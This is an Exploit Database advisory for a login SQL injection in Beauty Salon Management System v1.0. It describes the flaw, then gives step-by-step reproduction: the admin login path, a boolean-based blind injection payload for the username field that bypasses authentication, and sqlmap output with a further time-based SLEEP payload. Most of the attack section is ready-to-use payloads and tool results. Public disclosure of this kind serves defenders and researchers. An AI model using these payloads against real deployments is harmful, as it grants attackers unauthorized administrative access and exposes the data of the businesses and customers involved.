Beauty Salon Management System v1.0 – SQLi

• Exploit Database
• 35 阅读

• 作者： Fatih Nacar
  日期： 2023-07-04
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/51568/

• # Exploit Title: Beauty Salon Management System v1.0 - SQLi
  # Date of found: 04/07/2023
  # Exploit Author: Fatih Nacar
  # Version: V1.0
  # Tested on: Windows 10
  # Vendor Homepage: https://www.campcodes.com <https://www.campcodes.com/projects/retro-cellphone-online-store-an-e-commerce-project-in-php-mysqli/>
  # Software Link: https://www.campcodes.com/projects/beauty-salon-management-system-in-php-and-mysqli/
  # CWE: CWE-89
  
  Vulnerability Description -
  
  Beauty Salon Management System: V1.0, developed by Campcodes, has been
  found to be vulnerable to SQL Injection (SQLI) attacks. This vulnerability
  allows an attacker to manipulate login authentication with the SQL queries
  and bypass authentication. The system fails to properly validate
  user-supplied input in the username and password fields during the login
  process, enabling an attacker to inject malicious SQL code. By exploiting
  this vulnerability, an attacker can bypass authentication and gain
  unauthorized access to the system.
  
  Steps to Reproduce -
  
  The following steps outline the exploitation of the SQL Injection
  vulnerability in Beauty Salon Management System V1.0:
  
  1. Open the admin login page by accessing the URL:
  http://localhost/Chic%20Beauty%20Salon%20System/admin/index.php
  
  2. In the username and password fields, insert the following SQL Injection
  payload shown inside brackets to bypass authentication for usename
  parameter:
  
  {Payload: username=admin' AND 6374=(SELECT (CASE WHEN (6374=6374) THEN 6374
  ELSE (SELECT 6483 UNION SELECT 1671) END))-- vqBh&password=test&login=Sign
  In}
  
  3.Execute the SQL Injection payload.
  
  As a result of successful exploitation, the attacker gains unauthorized
  access to the system and is logged in with administrative privileges.
  
  Sqlmap results:
  
  POST parameter 'username' is vulnerable. Do you want to keep testing the
  others (if any)? [y/N] y
  
  sqlmap identified the following injection point(s) with a total of 793
  HTTP(s) requests:
  
  ---
  
  Parameter: username (POST)
  
  Type: boolean-based blind
  
  Title: AND boolean-based blind - WHERE or HAVING clause (subquery - comment)
  
  Payload: username=admin' AND 6374=(SELECT (CASE WHEN (6374=6374) THEN 6374
  ELSE (SELECT 6483 UNION SELECT 1671) END))-- vqBh&password=test&login=Sign
  In
  
  Type: time-based blind
  
  Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
  
  Payload: username=admin' AND (SELECT 1468 FROM (SELECT(SLEEP(5)))qZVk)--
  rvYF&password=test&login=Sign In
  
  ---
  
  [15:58:56] [INFO] the back-end DBMS is MySQL
  
  web application technology: PHP 8.2.4, Apache 2.4.56
  
  back-end DBMS: MySQL >= 5.0.12 (MariaDB fork)